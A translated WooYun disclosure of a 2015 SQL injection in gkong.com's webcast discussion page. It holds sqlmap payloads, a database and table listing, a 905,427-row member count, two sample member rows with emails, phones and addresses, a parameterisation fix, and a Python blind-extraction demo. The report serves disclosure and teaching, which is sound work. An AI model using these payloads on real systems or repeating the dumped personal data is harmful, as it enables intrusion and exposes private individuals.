Vulnerability summary
Defect ID: wooyun-2015-0124937
Title: SQL injection on 中华工控网 (gkong.com) exposes site-wide data, including 900,000 member records
Vendor: 中华工控网 (gkong.com)
Author: Ghost丶与狼共舞
Submitted: 2015-07-06 17:36
Fix date: 2015-08-20 17:38
Published: 2015-08-20 17:38
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 20
Status: Vendor could not be reached, or vendor actively ignored the report
Source: http://www.wooyun.org; for questions or help contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2015-07-06: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed
2015-08-20: Vendor has actively ignored the vulnerability; details disclosed to the public
Brief description:
SQL injection on 中华工控网 (gkong.com) exposes the site's entire data set, including about 900,000 member records
Detailed description:
Injection point: http://www.gkong.com/webcast/discussion.aspx?id=138 (GET), in the id parameter
Proof of vulnerability (sqlmap output):
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=138 AND 6150=6150
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=138 AND 5765=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(105)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (5765=5765) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(117)+CHAR(98)+CHAR(103)+CHAR(113)))
Type: UNION query
Title: Generic UNION query (NULL) - 16 columns
Payload: id=138 UNION ALL SELECT CHAR(113)+CHAR(118)+CHAR(105)+CHAR(120)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(117)+CHAR(120)+CHAR(114)+CHAR(85)+CHAR(98)+CHAR(78)+CHAR(71)+CHAR(72)+CHAR(113)+CHAR(117)+CHAR(98)+CHAR(103)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=138; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=138 WAITFOR DELAY '0:0:5'--
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: id=(SELECT CHAR(113)+CHAR(118)+CHAR(105)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (6041=6041) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(117)+CHAR(98)+CHAR(103)+CHAR(113))
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2000
available databases [11]:
[*] gkong_hh
[*] GKONG_MGMT
[*] GkongSearch
[*] GoToControl
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] test
Database: gkong
[378 tables]
+----------------------------------------------------+
| AD_AddCustomerCle |
| Blog_Downloads |
| BusinessCard |
| BusinessLicense |
| ChapterDing |
| CheckRequest |
| Comm_Pingpai_main |
| DataConvert_Source |
| DataConvert_Source |
| Dictionary_CompanyType |
| Dictionary_Occupation |
| Exp_Expert |
| Exp_ExpertType |
| FC_Factory |
| FC_LOG |
| FC_Trademarks |
| FC_User |
| GK_SMSHistory |
| GK_SMSHistory |
| GK_TOP10 |
| Gk_Area_Panel |
| GuestBook |
| KeyWordsAd |
| LogoLinks |
| OLC_20 |
| OLC_50 |
| OLC_70 |
| P2PUserOnline |
| SYS_20 |
| SYS_30 |
| SYS_40 |
| SYS_50 |
| SYS_PYTable |
| Sheet1 |
| Sheng |
| SynchronizeTable |
| Temp_Download_A |
| Temp_Download_B |
| Temp_Download_C |
| Temp_Download_D |
| ThirdPartyUser |
| UserAttachment |
| UserScoreYears |
| VIEW_BBS_APPlOGO |
| VIEW_BB_BBS1 |
| V_title |
| V_vote |
| View_BookOrder |
| View_IsBlog |
| View_Person_Bbs1_Board |
| View_Person_BbsTopic_Board |
| View_Person_GK_Blog_BlogText |
| tmp-src |
| address_area |
| admin_log |
| admin_option_log |
| arc_dc |
| arc_scbg |
| bb_Address |
| bb_Admin |
| bb_BBS1 |
| bb_BBSLink |
| bb_BBSNews |
| bb_BestTopic |
| bb_BoardPermission |
| bb_Bookmark |
| bb_Class |
| bb_Config |
| bb_Friend |
| bb_GroupName |
| bb_LockIP |
| bb_Log |
| bb_Message_bak |
| bb_Message_bak |
| bb_Notice_refuse |
| bb_Notices |
| bb_Online |
| bb_ScoreOperate |
| bb_SmallPaper |
| bb_UserAccess |
| bb_UserGroups |
| bb_UserScore20081030中午12点 |
| bb_UserScorePerDay |
| bb_UserTitle |
| bb_User_TransmitEmail |
| bb_Vote |
| bb_VoteUser |
| bb_board_trademark |
| bb_board_trademark |
| bb_download_info |
| bb_medal |
| bb_notdownload |
| bb_topic_info |
| bb_topic_info |
| bb_user_mobile |
| bb_user_mobile |
| bb_user_oauth |
| bb_vip |
| bbs_AppLogo |
| bbs_ExtrScoreLog |
| bbs_blackHouse |
| bbs_hotImages |
| bbs_talk |
| bbs_tuijian |
| blockWords |
| blog_admin |
| blog_bloginfo |
| blog_bloginfo |
| blog_blogteam |
| blog_classname |
| blog_comment |
| blog_filtrate |
| blog_jubao |
| blog_lockip |
| blog_message |
| blog_notdownload |
| blog_skin |
| blog_subject |
| blog_sysskin |
| blog_tag |
| blog_trackback |
| blog_user |
| blog_userskin |
| blog_usertype |
| book_addressList |
| book_class |
| book_gift |
| book_order |
| book_product |
| book_publish |
| bu_message |
| bu_order_goods |
| bu_order_list |
| caa_huiyuandanwei |
| campus_articles |
| campus_login |
| client_Dictionary |
| client_DownloadTable |
| comm_add_dl_pp |
| comm_cs1_dl |
| comm_cs_dl |
| comm_cs_pp |
| comm_dalei |
| comm_pinpai |
| comm_temp_pinpaileibie |
| cp_invite |
| cp_look |
| downloadSort |
| downloads_information |
| downloads_information |
| dtproperties |
| gk_2394872sadjkflsh_Templates |
| gk_5stars_info |
| gk_BBSWeekly |
| gk_Cheap |
| gk_Class |
| gk_Dictionary_Score |
| gk_EmailList |
| gk_EmailSubscribe |
| gk_News_OriginalType |
| gk_OnLineQuestion |
| gk_Sort_Content |
| gk_Sort_Content |
| gk_SubareaDetail |
| gk_SubareaDetail |
| gk_Templates_HTML_Detail |
| gk_Templates_HTML_List |
| gk_Templates_HTML_Url |
| gk_UserInformation |
| gk_UserScore |
| gk_UserScoreTrans_2008_2011 |
| gk_UserScoreTrans_2008_2011 |
| gk_UserScoreTrans_today |
| gk_WebCastLive |
| gk_WebCastLive |
| gk_WebCastQuestion |
| gk_WebCastRegister |
| gk_WebCastSection |
| gk_WebCastTeacher |
| gk_ad_date |
| gk_ad_date |
| gk_ad_layer |
| gk_admin |
| gk_applykey |
| gk_applykey |
| gk_area_improsort |
| gk_area_improsort |
| gk_area_index |
| gk_bbsztlist |
| gk_bbsztlist |
| gk_blog_CSTouPiaoRZ |
| gk_blog_CSUser |
| gk_blog_zt_sort |
| gk_blog_zt_sort |
| gk_book |
| gk_column |
| gk_copath |
| gk_diaocha_links |
| gk_edm_link |
| gk_elearn_onlinequestion |
| gk_elearn_onlinequestion |
| gk_elearn_teacher |
| gk_exhibit_column |
| gk_exhibit_column |
| gk_exhibit_info |
| gk_exhibit_links |
| gk_exhibits_wszt |
| gk_exhibits_zt |
| gk_express_user |
| gk_favor |
| gk_feedback |
| gk_field |
| gk_focus_tj |
| gk_focus_tj |
| gk_focus_type |
| gk_gg |
| gk_gkwGroup |
| gk_gkwGroupUsers |
| gk_hotQuestions |
| gk_hot_Keywords |
| gk_index_info_column |
| gk_index_info_column |
| gk_infobbs |
| gk_intercourse_questionary |
| gk_jianlinpeixun |
| gk_jxsbzzs |
| gk_kandian |
| gk_keywords |
| gk_learn_1 |
| gk_learn_1 |
| gk_lingyu_sort |
| gk_links |
| gk_loginLog |
| gk_lovewall |
| gk_msg_jubao |
| gk_mysearch |
| gk_news1 |
| gk_news_20100104 |
| gk_news_20100104 |
| gk_news_Templet |
| gk_news_sort |
| gk_oos |
| gk_pinpaileibie |
| gk_pro_series |
| gk_products |
| gk_questionary |
| gk_search_column |
| gk_search_key |
| gk_search_keywords |
| gk_search_log |
| gk_shop |
| gk_solution_20100104 |
| gk_solution_20100104 |
| gk_tuijianchanpin |
| gk_tuijianproducts |
| gk_tuwenbankuai |
| gk_userGroup |
| gk_webCastOnline |
| gk_weblink |
| gk_weekly |
| gk_wenzhai |
| gk_zhuanfang |
| gk_zhuanti |
| gk_zl_ass |
| gk_zt_lanmu |
| gk_ztsort |
| join_corporation |
| leavemess |
| login_log |
| mails_all |
| mails_auto |
| mails_gongkong |
| mails_tlm |
| mn_admin |
| mn_article |
| mn_books |
| mn_critique |
| mn_download |
| mn_infobbs |
| mn_kanhao |
| mn_log_data |
| mn_mans |
| mn_peixun |
| mn_people |
| mn_sec_sort |
| mn_sort |
| mn_sy_wenzhang |
| mn_user |
| op_user |
| rj_education |
| rj_experience |
| rj_infor |
| rj_look |
| rj_peixun |
| school_log |
| school_online |
| search_counter |
| sysconstraints |
| syssegments |
| try_product_intro |
| try_products |
| try_user |
| ty_GuestSay |
| v_user |
| view_BBS_Boards |
| view_BBS_ClassBoard |
| view_Download_List |
| view_INDEX_ALLbbUserScore |
| view_INDEX_Application_Learn |
| view_INDEX_Application_Solution |
| view_INDEX_BBS_pass_unpass |
| view_INDEX_BBS_pass_unpass |
| view_INDEX_BBS_pass_unpass |
| view_INDEX_Blog_pass_unpass |
| view_INDEX_Blog_pass_unpass |
| view_INDEX_Blog_pass_unpass |
| view_INDEX_Business_BBS |
| view_INDEX_Business_Buy |
| view_INDEX_Business_Supply |
| view_INDEX_Download_pass_unpass |
| view_INDEX_Download_pass_unpass |
| view_INDEX_Download_pass_unpass |
| view_INDEX_Downloads |
| view_INDEX_Enterprise_pass_unpass |
| view_INDEX_Enterprise_pass_unpass |
| view_INDEX_Enterprise_pass_unpass |
| view_INDEX_Invite |
| view_INDEX_News_pass_unpass |
| view_INDEX_News_pass_unpass |
| view_INDEX_News_pass_unpass |
| view_INDEX_Product_keywords_right |
| view_INDEX_Product_keywords_right |
| view_INDEX_Product_keywords_right |
| view_INDEX_Product_pass_unpass |
| view_INDEX_Product_pass_unpass |
| view_INDEX_SearchKey |
| view_INDEX_Solution_pass_unpass |
| view_INDEX_Solution_pass_unpass |
| view_INDEX_Solution_pass_unpass |
| view_INDEX_keywords |
| view_MailList_ExpressUser |
| view_MailList_Infor |
| view_MailList_IntercourseQuestionary |
| view_MailList_Questionary |
| view_MailList_bbUser |
| view_SynchronizationBBSTopic |
| view_Templates_Inc_NameCards_0 |
| view_Templates_Inc_NameCards_0 |
| view_Templates_Inc_NameCards_1 |
| view_Templates_Inc_buy_RIGHT |
| view_Templates_Inc_buy_USER |
| view_Templates_Inc_products_RIGHT |
| view_Templates_Inc_products_USER |
| view_Templates_KeyWordsAd_LIST_DETAIL |
| view_Templates_KeyWordsAd_LIST_DETAIL |
| view_Templates_News_Inc_Right_PreviousYears_Detail |
| view_Templates_News_Inc_Right_PreviousYears_Detail |
| view_Templates_News_Inc_Right_PreviousYears_Detail |
| view_Templates_News_Inc_Right_ThisYear_Detail |
| view_Templates_News_Inc_Right_ThisYear_Detail |
| view_Templates_News_YYYYMM_LIST_DETAIL |
| view_Templates_News_YYYYMM_LIST_DETAIL |
| view_Templates_News_YYYY_LIST_DETAIL |
| view_Templates_News_YYYY_LIST_DETAIL |
| view_Templates_infobbs_buy |
| view_Templates_products |
| view_Templates_user |
| view_ThirdPartyUser |
| view_bb_topic_info |
| view_bb_topic_info |
| view_bb_user_cn |
| view_solution_index_PageOne |
| view_solution_index_PageOne |
| web_ad |
| weixin_news |
| 经过北京邮件系统Mailbus发送失败的 |
| 论坛发贴邮箱 |
| gk_jishubu.gk_BBWeekly |
+----------------------------------------------------+
+--------------------------+---------+
| Table | Entries |
+--------------------------+---------+
| dbo.view_MailList_bbUser | 905427 |
+--------------------------+---------+
Sampling a few rows from dbo.view_MailList_bbUser (values are shown as dumped; MailType 注册用户 = registered user, l_xingzhi 生产厂家 = manufacturer, l_occupation 市场销售 = sales/marketing):
+--------+--------+----------+-------------------+-----------------+---------+---------+---------+--------------+----------+------------------------------------------+-----------+--------------------+------------+--------------+--------------------+--------------------+--------------+------------------------------------+
| MailID | l_pc   | l_tel    | Email             | l_addr          | l_quhao | l_grade | l_sheng | UserName     | MailType | l_hangye                                 | l_xingzhi | lastlogin          | l_province | l_fullname   | UpdateDate         | ChangeDate         | l_occupation | l_interested                       |
+--------+--------+----------+-------------------+-----------------+---------+---------+---------+--------------+----------+------------------------------------------+-----------+--------------------+------------+--------------+--------------------+--------------------+--------------+------------------------------------+
| 346706 | 314311 | 86766485 | huntercui@126.com | 浙江省海盐县沈荡镇中钱村黄泥浦 | 0573    | 0       | 7       | machinesprin | 注册用户     | 15, 24, 100                              | 生产厂家      | 06 14 2007 09:07PM | 浙江省        | 海盐县齐家机械弹簧厂   | 06 14 2007 09:08PM | 03 13 2008 03:17PM | 市场销售         | 11                                 |
| 380227 | 201906 | 36041343 | xiaojia86@126.com | 上海宝安公路455号      | 021     | 0       | 2       | xiaojia1986  | 注册用户     | 37, 15, 7, 41, 29, 5, 6, 23, 13, 30, 100 | 生产厂家      | 10 16 2007 04:48PM | 上海市        | 上海商德富吉电源有限公司 | 10 16 2007 04:49PM | 03 13 2008 03:43PM | 市场销售         | 19, 9, 5, 8, 20, 26, 17, 6, 27, 10 |
+--------+--------+----------+-------------------+-----------------+---------+---------+---------+--------------+----------+------------------------------------------+-----------+--------------------+------------+--------------+--------------------+--------------------+--------------+------------------------------------+
Fix recommendation:
Validate the id parameter and stop building the SQL statement by string concatenation: reject anything that is not an integer, then bind the value as a query parameter (a SqlParameter in ADO.NET) so it can never alter the statement. Filtering on its own is fragile; parameterisation is the actual fix. Independently, the application's database login should be confined to the application's own database: the output above shows it can enumerate eleven databases, including master and msdb, and that stacked queries are accepted, so the exposure is not limited to reading data.
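The proof section above is raw sqlmap output and the fix is stated in one line; the following added example (not code from this report and not gkong.com's application) makes both concrete. It stands up an in-memory SQLite database as a stand-in for the SQL Server back end (the table names, columns and the single member row are constructed assumptions), places the string-concatenation pattern that `id=138 AND 6150=6150` exploits beside a handler that validates and binds the parameter, and runs the boolean-based blind inference that a tool uses to dump data through such an endpoint against both handlers.

```python
import re
import sqlite3

# Constructed stand-in for the site's back end: an in-memory SQLite database.
# The table names, columns and the single member row are assumptions for the
# demo, not gkong.com's schema or data.
CON = sqlite3.connect(":memory:")
CON.executescript("""
    CREATE TABLE webcast_discussion (id INTEGER PRIMARY KEY, title TEXT);
    INSERT INTO webcast_discussion VALUES (138, 'Webcast discussion 138');
    CREATE TABLE members (id INTEGER PRIMARY KEY, username TEXT, email TEXT);
    INSERT INTO members VALUES (1, 'admin', 'admin@example.invalid');
""")


def discussion_vulnerable(id_param: str) -> str:
    """The bug class behind discussion.aspx: the raw query-string value is
    concatenated into the SQL text, so 'id=138 AND 6150=6150' rewrites the
    WHERE clause. A failed statement yields a distinct error page, which is
    the signal the error-based technique keys off."""
    sql = "SELECT title FROM webcast_discussion WHERE id=" + id_param
    try:
        row = CON.execute(sql).fetchone()
    except sqlite3.Error:
        return "Server Error"
    return row[0] if row else "Discussion not found"


def discussion_fixed(id_param: str) -> str:
    """The fix: reject anything that is not a small integer, then bind the
    value as a parameter so it can never become part of the statement."""
    if not re.fullmatch(r"[0-9]{1,9}", id_param):
        return "Bad Request"
    row = CON.execute(
        "SELECT title FROM webcast_discussion WHERE id=?", (int(id_param),)
    ).fetchone()
    return row[0] if row else "Discussion not found"


def is_true(handler, condition: str) -> bool:
    """Boolean-based blind oracle: the response for '138 AND <condition>'
    matches the untampered page only when the condition holds."""
    return handler("138 AND " + condition) == handler("138")


def is_injectable(handler) -> bool:
    """Sanity check before trusting the oracle: a true tautology must match
    the baseline and a false one must not. A parameterised endpoint fails
    the first half, because the payload never reaches the database."""
    return is_true(handler, "6150=6150") and not is_true(handler, "6150=6151")


def extract(handler, subquery: str, max_len: int = 64) -> str:
    """Read the scalar result of `subquery` one character at a time, binary
    searching each code point with seven yes/no questions. This is the
    inference behind a blind table dump; on SQL Server the same probes use
    LEN(), SUBSTRING() and ASCII() instead of length(), substr(), unicode()."""
    if not is_injectable(handler):
        return ""
    out = ""
    for pos in range(1, max_len + 1):
        if not is_true(handler, f"length(({subquery}))>={pos}"):
            break  # past the end of the value
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if is_true(handler, f"unicode(substr(({subquery}),{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    target = "SELECT email FROM members WHERE username='admin'"
    print("vulnerable injectable:", is_injectable(discussion_vulnerable))
    print("vulnerable leaks:", extract(discussion_vulnerable, target))
    print("row count, blind:", extract(discussion_vulnerable, "SELECT count(*) FROM members"))
    print("fixed injectable:", is_injectable(discussion_fixed))
    print("fixed leaks:", repr(extract(discussion_fixed, target)))
```

Against the vulnerable handler the tautology check passes and the admin's e-mail comes out a character at a time; against the fixed handler every tampered value is answered with "Bad Request", so the oracle never gets a true/false split and extraction returns nothing. A real oracle compares full response bodies after stripping dynamic content, which is why sqlmap also probes the error-based, UNION (16 columns here) and time-based channels: with a working UNION the dump proceeds a row at a time instead of a bit at a time, and a count such as the 905427 rows reported above is a single query rather than a blind search.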
Copyright notice: please credit Ghost丶与狼共舞@乌云 (WooYun) when reposting
Vulnerability response
Vendor response:
Vendor could not be reached, or vendor actively declined the report
Vulnerability Rank: 15 (WooYun rating)